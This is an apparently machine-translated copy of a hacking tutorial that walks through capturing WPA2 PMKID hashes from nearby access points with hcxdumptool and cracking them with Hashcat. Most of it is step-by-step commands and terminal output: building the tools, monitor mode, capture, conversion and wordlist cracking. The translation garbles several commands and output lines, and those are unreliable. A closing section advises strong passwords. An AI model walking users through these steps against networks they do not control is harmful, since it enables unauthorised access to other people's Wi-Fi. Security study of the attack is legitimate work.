قالب وردپرس درنا توس
Home / Tips and Tricks / WPA2 passwords crack with the new PMKID Hashcat attack «Null Byte :: WonderHowTo

WPA2 passwords crack with the new PMKID Hashcat attack «Null Byte :: WonderHowTo



WPA2 network password cracking has been about the same for many years, but a newer attack requires less interaction and information than previous techniques and has the added advantage of being able to focus on access points without anyone being connected. The latest attack on the PMKID uses Hashcat to crack WPA passwords and allows hackers to find networks with weak passwords more easily.

The old way to crack WPA2 passwords

The old way to crack WPA2 has been around for a long time and means that disconnects a connected device from the access point that we want to try to crack. This has two disadvantages, which are essential for Wi-Fi hackers to understand.

The first drawback is the requirement that someone is connected to the network to attack it. The network password may be weak and very easy to break, but without a device connected for a short start, there is no way to capture a handshake, so no chance of trying to crack it.

The second disadvantage of this tactic is that it is noisy and legally disturbing because it forces you to send packages that intentionally prohibit an authorized user for a service that they pay to use. This type of unauthorized interference is technically a denial of service attack and, if maintained, the same as disrupting a network. It can get you in trouble and is easily detected by some of our earlier manuals.

A new method for cracking passwords

Instead of relying on two-way communication between Wi-Fi devices to attempt to crack the password, an attacker could communicate directly with a vulnerable access point using the new method. On August 4, 2018, a post on the Hashcat forum described a new technique that made use of an attack on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame to capture the required information to try a brutal force attack.

As with the previous attacks on WPA, the attacker must be close to the network that he wants to attack. The goal is to use a Kali-compatible wireless network adapter to collect the necessary information from the network to brutally force the password. Instead of using Aireplay-ng or Aircrack-ng, we use a new wireless attack tool to do this, called hcxtools. tests, and they allow us to communicate with nearby Wi-Fi networks to record WPA handshakes and PMKID hashes. It works similar to Besside-ng because it requires minimal arguments to start an attack from the command line, can be executed against specific goals or goals of convenience and can be quickly executed via SSH on a Raspberry Pi or another device without screen.

After the PMKID has been recorded, the next step is to load the hash into Hashcat and try to crack the password. Here, hcxtools differs from Besside-ng because a conversion step is required to prepare the file for Hashcat. We will use hcxpcaptool to convert our PCAPNG file to one that Hashcat can work with, leaving only the step of selecting a robust list of passwords for your brute-forcing attempts.

It is worth noting that not every network is vulnerable to this attack. Because this is an optional field that is added by some manufacturers, you cannot expect universal success with this technique. Whether you can capture the PMKID depends on whether the manufacturer of the access point preferred you to include an element it contained, and whether you can crack the captured PMKID depends on whether the underlying password is included in your brute-force password list. If neither of these conditions is met, this attack will fail.

What You Need

To try this attack, you must run Kali Linux and have access to a wireless network adapter that supports monitor mode and package injection. We have several manuals on how to select a compatible wireless network adapter below.

In addition to a Kali-compatible network adapter, ensure that you have fully updated and upgraded your system. If you do not, some packages may be out of date and cause problems during capture.

Recommended: The Alfa AWUS036NHA 2.4 GHz

Step 1: Install Hxctools and Hashcat

First, we will install the tools we need. Type the following in a terminal window to download them.

  ~ # git clone https://github.com/ZerBea/hcxdumptool.git

Clones in & # 39; hcxdump tool & # 39; ...
remote: list objects: 133, done.
remote: objects count: 100% (133/133), ready.
external: compress objects: 100% (97/97), ready.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB / s, ready.
Delta & # 39; s solution: 100% (1434/1434), done. 

Then go to the directory and complete the installation with make and then install .

  ~ # cd hcxdumptool
~ / hcxdumptool # make

cc -O3 -Wall -Wextra -std = gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std = gnu99 -o hcxdumptool hcxdumptool.c -lcrypto

~ / hcxdumptool # make install

cc -O3 -Wall -Wextra -std = gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std = gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
install -m 0755 -D hcxpioff / usr / local / bin / hcxpioff
install -m 0755 -D hcxdumptool / usr / local / bin / hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f * .o * ~ 

When the installation is complete, we will continue to install hxctools. To do this, open a new terminal window or leave the / hexdumptool folder and then install hxctools.

  ~ / hcxdumptool # cd
~ # git clone https://github.com/ZerBea/hcxtools.git

Cloning in & # 39; hcxtools & # 39; ...
remote: list objects: 120, done.
external: objects count: 100% (120/120), ready.
external: compress objects: 100% (82/82), ready.
external: total 6196 (delta 77), reused 79 (delta 38), package reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB / s, ready.
Delta & # 39; s solution: 100% (4320/4320), ready. 

Then go to the directory and execute make and make install as before. If you get an error message, try typing sudo for the command.

  ~ # cd hcxtools
~ / hcxtools # make

mkdir -p .deps
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

Install ~ / hcxtools # make

install -m 0755 -D hcxpcapngtool / usr / local / bin / hcxpcapngtool
install -m 0755 -D hcxhashtool / usr / local / bin / hcxhashtool
install -m 0755 -D hcxpsktool / usr / local / bin / hcxpsktool
install -m 0755 -D hcxwltool / usr / local / bin / hcxwltool
install -m 0755 -D wlancap2wpasec / usr / local / bin / wlancap2wpasec
install -m 0755 -D whoismac / usr / local / bin / whoismac
install -m 0755 -D hcxpmkidtool / usr / local / bin / hcxpmkidtool
install -m 0755 -D wlanhcx2john / usr / local / bin / wlanhcx2john
install -m 0755 -D hcxpcaptool / usr / local / bin / hcxpcaptool
install -m 0755 -D hcxhashcattool / usr / local / bin / hcxhashcattool
install -m 0755 -D hcxmactool / usr / local / bin / hcxmactool
install -m 0755 -D hcxessidtool / usr / local / bin / hcxessidtool
install -m 0755 -D hcxhash2cap / usr / local / bin / hcxhash2cap
install -m 0755 -D wlanhc2hcx / usr / local / bin / wlanhc2hcx
install -m 0755 -D wlanwkp2hcx / usr / local / bin / wlanwkp2hcx
install -m 0755 -D wlanhcxinfo / usr / local / bin / wlanhcxinfo
install -m 0755 -D wlanhcx2ssid / usr / local / bin / wlanhcx2ssid
install -m 0755 -D wlanhcxcat / usr / local / bin / wlanhcxcat
install -m 0755 -D wlanpmk2hcx / usr / local / bin / wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx / usr / local / bin / wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk / usr / local / bin / wlancow2hcxpmk 

Finally, we have to install Hashcat, which should be simple, because it is included as standard in the Kali Linux repo. Simply type the following to install the latest version of Hashcat.

  ~ / hcxtools # cd
~ install apt hashcat

Read package lists ... Ready
Build dependency structure
Read status information ... Done
hashcat is already the newest version (5.1.0 + ds1-1).
The following packages were installed automatically and are no longer required:
libdouble-conversion1 liblinear3
Use & # 39; apt autoremove & # 39; to delete them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded. 

With this complete we can continue to set up the wireless network adapter.

Step 2: Prepare the wireless network adapter

After connecting in your Kali-compatible wireless network adapter, you can find the name by typing ifconfig or ip a . It is usually named wlan0. The first step is to put the card in wireless monitor mode so that we can listen to WiFi traffic in the immediate area.

To do this, type the following command in a terminal window, entering the name of your wireless network adapter for wlan0.

  ~ # airmon-ng start wlan0

Found 3 processes that can cause problems
Kill them with & # 39; airmon-ng check kill & # 39; before you place them
the card in monitor mode, they will interfere by changing channels
and sometimes restore the interface to managed mode

PID name
555 NetworkManager
611 wpa_supplicant
6636 dh client

Chipset PHY interface driver

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 wireless network adapter (rev 01)

(mac80211 monitor mode vif enabled for [phy0] wlan0 on [phy0] wlan0mon)
(mac80211 station mode vif disabled for [phy0] wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n 

Your wireless network adapter must now have a name as "wlan0mon" and be in monitor mode. You can confirm this by re-executing ifconfig .

Step 3: Use Hxcdump to capture PMKID & # 39; s from local networks

Now we are ready to capture the PMKID & # 39; s from devices that we want to attempt to attack. With our wireless network adapter in monitor mode as "wlan1mon", we perform the following command to start the attack.

  ~ # hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status = 1 

Abort this, -i tells the program which interface we use, in this case wlan1mon. The file name to which we save the results can be specified with the flag argument -o . The channel on which we want to scan can be indicated with the flag -c followed by the number of the channel to be scanned.

In our command above, we use wlan1mon to save captured PMKID & # 39; s in a file called "galleria.pcapng." Although you can specify a different value status I have been unsuccessful with any value except 1 .

  warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start recording (stop with ctrl + c)
INTERFACE: ...............: wlan1mon
FILTER LIST ...............: 0 entries
MAC CUSTOMER ...............: fcc233ca8bc5
MAC ACCESS POINT .........: 10ae604b9e82 (increased with each new client)
EAPOL TIME-OUT ............: 150000
REPLAYCOUNT ..............: 62439
ANONCE ...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001]   c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001]   2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001]   2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011]   14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011]   88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011]   dc7fa425888a -> fcc233ca8bc5 [19659047] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001]   9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001]   9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011]   803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011]   14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006]   0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005]   e0220203294e -> fcc233ca8bc5 [19659054] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008]   14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008]   1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009]   e0220453a576 - cc2dc8d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d
INFO: cha = 2, rx = 32752, rx (dropped) = 2801, tx = 2205, poked = 18, err = 0 

If you have collected enough, you can stop the program by typing C to end the attack. This should produce a PCAPNG file that contains the information we need to attempt a brute-forcing attack, but we must convert it to a format that Hashcat can understand.

Step 4: Use Hxcpcaptool to convert the Dash for Hashcat

To convert our PCAPNG file, we use hcxpcaptool with a few specified arguments. In the same folder where your .PCAPNG file is stored, execute the following command in a terminal window.

  ~ # hcxpcaptool -E essidlist -I identity list -U usernamelist -z galleriaHC.16800 galleria.pcapng 

This command is to tell hxcpcaptool to use the information in the file to help Hashcat understand it with the flags -E -I and -U . The flag -Z is used for the name of the newly converted file that Hashcat must use and the last part of the command is the PCAPNG file that we want to convert.

Executing the command must show us the following.

  summary:
--------
filename ....................: galleria.pcapng
file type ....................: pcapng 1.0
information about file hardware ....: x86_64
file os information ..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type .................: DLT_IEEE802_11_RADIO (127)
endianess ....................: small endian
reading errors ..................: flawless
packages within ...............: 1089
skipped packages ..............: 0
packages with GPS data ........: 0
packages with FCS .............: 732
beacons (with ESSID in it): 49
probe requests ...............: 26
probe reactions ..............: 40
association requests .........: 103
association reactions ........: 204
reselling requests .......: 2
reassocaition reactions ......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM) ...: 114
authentications (APPLE) ......: 1
EAPOL packages ................: 304
EAPOL PMKID & # 39; s .................: 21
best handshakes ..............: 4 (ap-less: 1)

21 PMKID (s) written to galleriahC.16800 

Here we can see that we have collected 21 PMKIDs in a short time. Now we can use the "galleriaHC.16800" file in Hashcat to crack network passwords.

Step 5: Select a Password List and Brute Force with Hashcat

To attack the hashes that we have recorded, we will have to choose a good password list. You can find several good password lists to get started in the SecList collection. Once you have a password list, place it in the same folder as the .16800 file that you just converted and run the following command in a terminal window.

  ~ # hashcat -m 16800 galleriaHC.16800 -a 0 - kernel-accel = 1 -w 4 --force & # 39; topwifipass.txt & # 39; 

With this command we launch Hashcat in the mode 16800 that is intended for attacking WPA-PMKID-PBKDF2 network protocols. Next, we specify the name of the file that we want to crack, in this case "galleriaHC.16800." The -a flag tells us which types of attacks we should use, in this case a "straight" attack, and then the -w and – kernel-accel = 1 flags indicates the workload profile with the highest performance. If your computer has performance problems, you can decrease the number in the argument -w .

Next, the option – force ignores all warnings to continue the attack, and the last part of the command indicates the password list that we use to brutally display the PMKID & # 39; s in our file forcing, in this case called "topwifipass.txt".

  hashcat (v4.2.1) from ...

OpenCL Platform # 1: The pocl project
===========================================
* Device # 1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB assignable, 4MCU

Hashes: 21 digests; 21 unique summaries, 20 unique salts

Bitmaps: 16 bits, 65536 inputs, 0x0000ffff mask, 262144 bytes, 5/13 rotations
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow Hash SIMD LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: temperature cut-off trigger disabled.

* Device # 1: build_opts & # 39; -cl-std = CL1.1 -I OpenCL -I / usr / share / hashcat / OpenCL -D VENDOR ID = 64 -D CUDA_ARCH = 0 -D AMD_ROCM = 0 -D VECT_SIZE = 4 - D DEVICE_TYPE = 2 -D DGST_R0 = 0 -D DGST_R1 = 1 -D DGST_R2 = 2 -D DGST_R3 = 3 -D DGST_ELEM = 4 -D CORE_TYPE = 16800 -D _unroll & # 39;
Dictionary cache hit:

* File name ..: topwifipass.txt
* Passwords.: 4801
* Bytes .....: 45277
* Keyspace ..: 4801

[s] tatus [p] ause [b] ypass [c] heckpoint [q] off => 

Depending on your hardware speed and the size of your password list, this can take quite some time to complete. To view the status at any time, you can press the S key for an update.

Step 6: Interpreting the Results

While Hashcat breaks, you can check in as it progresses to see if keys have been restored.

  Hash.Type ........: WPA-PMKID-PBKDF2
Hash.Target ......: galleriaHC.16800
Time.Started .....: Sun 28 Oct 22:32:57 2018 (7 minutes, 50 sec)
Time.Estimated ...: Sun 28 Oct 22:57:50 2018 (17 minutes, 3 sec)
Guess.Base .......: File (topwifipass.txt)
Guess.Queue ......: 1/1 (100.00%)
Speed.Dev. # 1 .....: 64 H / s (15.43ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4
Restored ........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress .........: 30180/96020 (31.43%)
Rejected .........: 0/30180 (0.00%)
Restore.Point ....: 1508/4801 (31.41%)
Candidates. # 1 ....: peter123 -> money man
HWon.Dev. # 1 ......: N / A

[s] tatus [p] ause [b] ypass [c] heckpoint [q] from =>

Session ..........: hashcat
Status ...........: Active
Hash.Type ........: WPA-PMKID-PBKDF2
Hash.Target ......: galleriaHC.16800
Time.Started .....: Sun 28 Oct 22:32:57 2018 (19 minutes, 56 sec)
Time.Estimated ...: Sun 28 Oct 22:57:54 2018 (5 minutes, 3 sec)
Guess.Base .......: File (topwifipass.txt)
Guess.Queue ......: 1/1 (100.00%)
Speed.Dev. # 1 .....: 64 H / s (15.24ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4
Restored ........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress .........: 76736/96020 (79.92%)
Rejected .........: 0/76736 (0.00%)
Restore.Point ....: 3836/4801 (79.90%)
Candidates. # 1 ....: monopoli -> mercenary
HWon.Dev. # 1 ......: N / A

[s] tatus [p] ause [b] ypass [c] heckpoint [q] off => 

When the password list is running low, Hashcat will automatically adjust the workload and give you a final report when it completes.

  Approaching final key space - workload adjusted.

Session ..........: hashcat
Status ...........: exhausted
Hash.Type ........: WPA-PMKID-PBKDF2
Hash.Target ......: hotspotcap.16800
Time.Started .....: Sun 28 Oct 18:05:57 2018 (3 minutes, 49 sec)
Time.Estimated ...: Sun 28 Oct 18:09:46 2018 (0 sec)
Guess.Base .......: File (topwifipass.txt)
Guess.Queue ......: 1/1 (100.00%)
Speed.Dev. # 1 .....: 42 H / s (15.56ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4
Recovered ........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress .........: 9602/9602 (100.0%)
Rejected .........: 2/9602 (0.02%)
Restore.Point ....: 4801/4801 (100.0%)
Candidates. # 1 ....: 159159159 -> 00001111
HWon.Dev. # 1 ......: N / A

Started: Sun 28 Oct 18:05:56 2018
Stopped: Sun 28 Oct 18:09:49 2018 

If you have succeeded in cracking passwords, you will see them here. During our test run, none of the PMKIDs that we had collected contained any passwords in our password list, so we were unable to crack any hashes. This will probably also be your result for networks with a strong password, but expect to see results here for networks with a weak password.

The PMKID Hashcat attack makes Wi-Fi attacks easier

While the new attack on Wi-Fi-Fi passwords makes it easier for hackers to try an attack on a target, the same methods that were effective against previous types of WPA cracking remain effective. If your network does not even support the robust security element with the PMKID, this attack has no chance of success. You can check your own network with hcxtools to see if it is susceptible to this attack.

Even if your network is vulnerable, a strong password is still the best defense against an attacker gaining access to your Wi-Fi network using this or another password cracking attack.

Because these attacks depend on guessing the password that the Wi-Fi network uses, there are two common guesses; The first are users who choose poor or standard bad passwords, such as & # 39; 12345678 & # 39; or & # 39; password & # 39 ;. These will be cracked easily. The second source of password estimates comes from data breaches that reveal millions of real user passwords. Because many users will reuse passwords between different types of accounts, these lists are generally very effective in cracking Wi-Fi networks.

I hope you enjoyed this guide for the new PMKID-based Hashcat attack on WPA2 passwords! If you have questions about this tutorial about cracking WiFi passwords or have a comment, you can reach me on Twitter @KodyKinzie .

Don't miss it: Null Byte & # 39; s collection of Wi-Fi Hacking Guides

Cover photo and screenshots by Kody / Null Byte




Source link